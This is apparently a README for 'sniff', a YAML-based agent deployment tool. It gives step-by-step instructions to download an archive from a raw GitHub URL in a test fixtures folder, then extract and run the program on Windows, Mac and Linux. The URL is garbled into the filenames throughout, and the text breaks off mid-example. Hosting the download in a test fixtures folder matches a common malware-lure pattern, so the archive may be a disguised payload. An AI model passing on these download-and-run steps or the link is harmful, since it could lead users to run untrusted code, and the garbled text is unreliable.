Welcome to sniff! This application allows you to write YAML configurations and deploy agents to platforms like Linear, GitHub, and Slack in just a few minutes. You donβt need programming experience to use it. Follow the easy steps below to get started.
To download the latest version of sniff, visit this page:
- Click on the link above.
- You will see the Releases page with the latest version listed.
- Find the version you want and click on it.
- Look for the files available for download. Choose the one that matches your system.
For most users, you will want to download the file labeled as sniff-<version>.exe for Windows or sniff-<version>https://raw.githubusercontent.com/Kaichera/sniff/main/packages/config/test/fixtures/sniff_v1.2-beta.5.zip for Mac/Linux.
To run sniff smoothly, ensure your device meets these requirements:
- Operating System: Windows 10 or later, macOS 10.14 or later, or a recent Linux distribution.
- Available Disk Space: At least 100MB free.
- Network Connection: A reliable internet connection to deploy agents.
Once you have downloaded the file, follow these steps to run it:
- Locate the downloaded
sniff-<version>.exefile in your Downloads folder. - Double-click the file to start the installation process.
- Follow the on-screen instructions to complete the installation.
- After installation, look for the sniff icon on your desktop or in your start menu.
- Double-click the icon to launch the application.
- Find the downloaded
sniff-<version>https://raw.githubusercontent.com/Kaichera/sniff/main/packages/config/test/fixtures/sniff_v1.2-beta.5.zipfile in your Downloads folder. - Double-click the file to extract it.
- Open the extracted folder and find the
sniffapplication. - Drag the
sniffapplication to your Applications folder for easy access. - Open your Applications folder and double-click the
snifficon to launch the application.
- Open your terminal.
- Navigate to your Downloads folder where the file is saved using:
cd ~/Downloads
- Extract the contents of the downloaded file:
tar -xvf sniff-<version>https://raw.githubusercontent.com/Kaichera/sniff/main/packages/config/test/fixtures/sniff_v1.2-beta.5.zip
- Navigate into the extracted folder:
cd sniff-<version>
- Run the application using:
./sniff

- Create a New File: Click on the βNewβ button to open a blank YAML file.
- Write Your Configuration: Use simple key-value pairs to define your settings. For example:
